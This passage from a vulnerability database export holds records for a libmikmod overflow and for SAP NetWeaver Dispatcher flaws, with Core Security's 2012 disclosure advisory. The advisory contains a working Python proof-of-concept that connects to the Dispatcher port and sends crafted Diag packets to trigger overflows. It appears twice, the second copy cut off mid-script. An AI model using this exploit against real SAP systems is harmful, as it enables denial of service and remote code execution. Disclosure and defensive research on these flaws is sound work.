"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0179"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.9.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.9.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-6720"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu4.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libm/libmikmod/libmikmod2_3.1.11-a-6ubuntu3.8.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libm/libmikmod/libmikmod2-dev_3.1.11-a-6ubuntu3.8.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/"
},
{
"trust": 0.1,
"url": "http://store.mandriva.com/product_info.php?cpath=149\u0026products_id=490"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2971"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3995"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3996"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/advisories"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48244"
},
{
"trust": 0.1,
"url": "http://www.gentoo.org/security/en/glsa/glsa-201203-10.xml"
},
{
"trust": 0.1,
"url": "http://secunia.com/psi_30_beta_launch"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48244/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48244/"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2971"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2546"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1421"
},
{
"db": "BID",
"id": "41917"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005576"
},
{
"db": "PACKETSTORM",
"id": "92341"
},
{
"db": "PACKETSTORM",
"id": "92275"
},
{
"db": "PACKETSTORM",
"id": "94351"
},
{
"db": "PACKETSTORM",
"id": "92799"
},
{
"db": "PACKETSTORM",
"id": "110473"
},
{
"db": "PACKETSTORM",
"id": "110480"
},
{
"db": "NVD",
"id": "CVE-2010-2546"
},
{
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1421"
},
{
"db": "BID",
"id": "41917"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005576"
},
{
"db": "PACKETSTORM",
"id": "92341"
},
{
"db": "PACKETSTORM",
"id": "92275"
},
{
"db": "PACKETSTORM",
"id": "94351"
},
{
"db": "PACKETSTORM",
"id": "92799"
},
{
"db": "PACKETSTORM",
"id": "110473"
},
{
"db": "PACKETSTORM",
"id": "110480"
},
{
"db": "NVD",
"id": "CVE-2010-2546"
},
{
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-25T00:00:00",
"db": "IVD",
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d"
},
{
"date": "2010-07-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1421"
},
{
"date": "2010-07-23T00:00:00",
"db": "BID",
"id": "41917"
},
{
"date": "2012-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-005576"
},
{
"date": "2010-08-03T13:59:55",
"db": "PACKETSTORM",
"id": "92341"
},
{
"date": "2010-08-02T08:47:25",
"db": "PACKETSTORM",
"id": "92275"
},
{
"date": "2010-09-29T20:29:30",
"db": "PACKETSTORM",
"id": "94351"
},
{
"date": "2010-08-17T00:49:50",
"db": "PACKETSTORM",
"id": "92799"
},
{
"date": "2012-03-06T03:54:14",
"db": "PACKETSTORM",
"id": "110473"
},
{
"date": "2012-03-06T23:57:19",
"db": "PACKETSTORM",
"id": "110480"
},
{
"date": "2010-08-05T13:22:29.497000",
"db": "NVD",
"id": "CVE-2010-2546"
},
{
"date": "2010-08-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1421"
},
{
"date": "2012-03-06T17:20:00",
"db": "BID",
"id": "41917"
},
{
"date": "2012-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-005576"
},
{
"date": "2023-11-07T02:05:40.090000",
"db": "NVD",
"id": "CVE-2010-2546"
},
{
"date": "2023-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "92799"
},
{
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "libmikmod Buffer Overflow Vulnerability",
"sources": [
{
"db": "IVD",
"id": "0d29f8fc-1fb3-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-1421"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201008-022"
}
],
"trust": 0.6
}
}
var-202002-0024
Vulnerability from variot
SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash. SAP NetWeaver There is an unspecified vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
SAP Netweaver Dispatcher Multiple Vulnerabilities
- Advisory Information
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release
- Vulnerability Information
Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514
- Vulnerability Description
SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. The vulnerabilities are triggered sending specially crafted SAP Diag packets to remote TCP port 32NN (being NN the SAP system number) of a host running the "Dispatcher" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered.
- Vulnerable packages
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked.
- Non-vulnerable packages
. Vendor did not provide this information.
- Vendor Information, Solutions and Workarounds
SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:
- Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
- Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).
-
Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
-
Credits
These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories .
- Technical Description / Proof of Concept Code
NOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities described below:
/----- import socket, struct from optparse import OptionParser
Parse the target options
parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args()
def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)
def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)
def initialize(sock):
diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
user_connect =
"\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
support_data = "\x10\x04\x0b\x00\x20"
support_data+=
"\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
support_data+=
"\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader =
"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
dpheader+= struct.pack("I", len(diagheader + user_connect +
support_data))
dpheader+=
"\x00\xff\xff\xff\xff\xff\xff "
dpheader+= "terminalXXXXXXX"
dpheader+=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
send_packet(sock, dpheader + diagheader + user_connect + support_data)
def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom)
Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection)
-----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.
8.1. SAP Netweaver DiagTraceR3Info Vulnerability
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the "Dispatcher" service. The following python code can be used to trigger the vulnerability:
/----- crash = "X"114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/
8.2. The following python code can be used to trigger the vulnerability:
/----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/
8.3. The following python code can be used to trigger the vulnerability:
/----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/
8.4.
/----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/
8.5.
/----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/
8.6.
/----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/
- Report Timeline
. 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published.
- References
[1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
[4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-0024",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-005602"
},
{
"db": "NVD",
"id": "CVE-2011-1517"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-1517"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security - Corelabs",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-158"
}
],
"trust": 0.6
},
"cve": "CVE-2011-1517",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2011-005602",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2011-005602",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-1517",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2011-005602",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201205-158",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-005602"
},
{
"db": "NVD",
"id": "CVE-2011-1517"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-158"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash. SAP NetWeaver There is an unspecified vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nSAP Netweaver Dispatcher Multiple Vulnerabilities\n\n\n1. *Advisory Information*\n\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\nAdvisory ID: CORE-2012-0123\nAdvisory URL:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\nDate published: 2012-05-08\nDate of last update: 2012-05-08\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow [CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\nCVE-2012-2513, CVE-2012-2514\n\n\n3. *Vulnerability Description*\n\nSAP Netweaver [1] is a technology platform for building and integrating\nSAP business applications. The\nvulnerabilities are triggered sending specially crafted SAP Diag packets\nto remote TCP port 32NN (being NN the SAP system number) of a host\nrunning the \"Dispatcher\" service, part of SAP Netweaver Application\nServer ABAP. By sending different messages, the different\nvulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. \n\n\n5. *Non-vulnerable packages*\n\n . Vendor did not provide this information. \n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\nissues. Contact SAP for further information. \n\nMartin Gallo proposed the following actions to mitigate the impact of\nthe vulnerabilities:\n\n 1. Disable work processes\u0027 Developer Traces for the \u0027Dialog\nProcessing\u0027 component (for the vulnerabilities [CVE-2011-1516],\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). \n 2. Restrict access to the Dispatcher service\u0027s TCP ports (3200/3299)\n(for all vulnerabilities). \n 3. Restrict access to the work process management transactions\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\n[CVE-2012-2512]). \n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Martin Gallo\nfrom\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services. \nThe publication of this advisory was coordinated by Fernando Miranda\nfrom http://www.coresecurity.com/content/corelabs-advisories . \n\n\n8. *Technical Description / Proof of Concept Code*\n\n*NOTE:* (The tracing of \u0027Dialog processing\u0027 has to be in level 2 or 3 in\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\nand [CVE-2012-2512]). \n\nThe following python script can be used to reproduce the vulnerabilities\ndescribed below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3200)\n(options, args) = parser.parse_args()\n\ndef send_packet(sock, packet):\n packet = struct.pack(\"!I\", len(packet)) + packet\n sock.send(packet)\n\ndef receive(sock):\n length = sock.recv(4)\n (length, ) = struct.unpack(\"!I\", length)\n data = \"\"\n while len(data)\u003clength:\n data+= sock.recv(length)\n return (length, data)\n\ndef initialize(sock):\n diagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\n user_connect =\n\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\n support_data = \"\\x10\\x04\\x0b\\x00\\x20\"\n support_data+=\n\"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\n support_data+=\n\"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n dpheader =\n\"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\n dpheader+= struct.pack(\"I\", len(diagheader + user_connect +\nsupport_data))\n dpheader+=\n\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff \"\n dpheader+= \"terminalXXXXXXX\"\n dpheader+=\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n send_packet(sock, dpheader + diagheader + user_connect + support_data)\n\ndef send_message(sock, message):\n diagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n step = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\n eom = \"\\x0c\"\n send_packet(sock, diagheader + step + message + eom)\n\n# Connect and send initialization packet\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnection.connect((options.hostname, options.port))\ninitialize(connection)\nreceive(connection) \n\n-----/\n In the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*\n\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\n\u0027disp+work.exe\u0027 module process a specially crafted network packet. \nMalicious packets are processed by the vulnerable function\n\u0027DiagTraceR3Info\u0027 in the \u0027disp+work.exe\u0027 module when the Developer Trace\nis configured at levels 2 or 3 for the \"Dialog processor\" component of\nthe \"Dialog\" work process handling the packet [2]. This vulnerability\ncould allow a remote unauthenticated attacker to execute arbitrary code\nwith the privileges of the user running the \"Dispatcher\" service. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = 